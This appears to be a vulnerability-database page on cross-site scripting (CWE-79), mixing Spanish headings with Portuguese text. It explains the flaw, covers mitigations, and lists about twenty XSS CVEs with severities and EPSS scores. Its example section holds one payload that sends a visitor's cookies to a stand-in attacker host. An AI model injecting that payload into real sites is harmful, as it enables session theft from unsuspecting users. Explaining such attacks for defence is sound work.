Fallos del tipo CWE-79

28.640 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2019-3776HIGHReflected XSS in Pivotal Operations ManagerEPSS 0.8%CVE-2024-2630MEDIUMInappropriate implementation in iOS in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to leak cross-origin data via a crafteEPSS 0.8%CVE-2021-21515CRITICALDell EMC SourceOne, versions 7.2SP10 and prior, contain a Stored Cross-Site Scripting vulnerability. A remote low privileged attacker may poEPSS 0.8%CVE-2022-27845MEDIUMWordPress Plausible Analytics plugin <= 1.2.2 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.8%CVE-2023-39516MEDIUMStored Cross-Site-Scripting on data_sources.php debug html-block in CactiEPSS 0.8%CVE-2020-7571—A CWE-79 Multiple Improper Neutralization of Input During Web Page Generation (Cross-site Scripting Reflected) vulnerability exists in EcoStEPSS 0.8%CVE-2020-7570—A CWE-79 Improper Neutralization of Input During Web Page Generation (Cross-site Scripting Stored) vulnerability exists in EcoStruxure BuildEPSS 0.8%CVE-2021-4020HIGHCross-site Scripting (XSS) - Stored in meetecho/janus-gatewayEPSS 0.8%CVE-2021-34666MEDIUMAdd Sidebar <= 2.0.0 Reflected Cross-Site ScriptingEPSS 0.8%CVE-2021-34665MEDIUMWP SEO Tags <= 2.2.7 Reflected Cross-Site ScriptingEPSS 0.8%CVE-2021-34657MEDIUMTypoFR <= 0.11 Reflected Cross-Site ScriptingEPSS 0.8%CVE-2021-34652MEDIUMMedia Usage <= 0.0.4 Reflected Cross-Site ScriptingEPSS 0.8%CVE-2022-24746MEDIUMHTML injection possibility in voucher code formEPSS 0.8%CVE-2021-34655MEDIUMWP Songbook <= 2.0.11 Reflected Cross-Site ScriptingEPSS 0.8%CVE-2021-32644MEDIUMCross-site Scripting in Random.phpEPSS 0.8%CVE-2022-29182MEDIUMDOM-based XSS in GoCDEPSS 0.8%CVE-2022-2523HIGHCross-site Scripting (XSS) - Reflected in beancount/favaEPSS 0.8%CVE-2019-9539—Telos Automated Message Handling System reflected XSS in ModalWindowPopup.aspEPSS 0.8%CVE-2019-9542—Telos Automated Message Handling System reflected XSS in itemlookup.aspEPSS 0.8%CVE-2019-9540—Telos Automated Message Handling System reflected XSS in prefs.aspEPSS 0.8%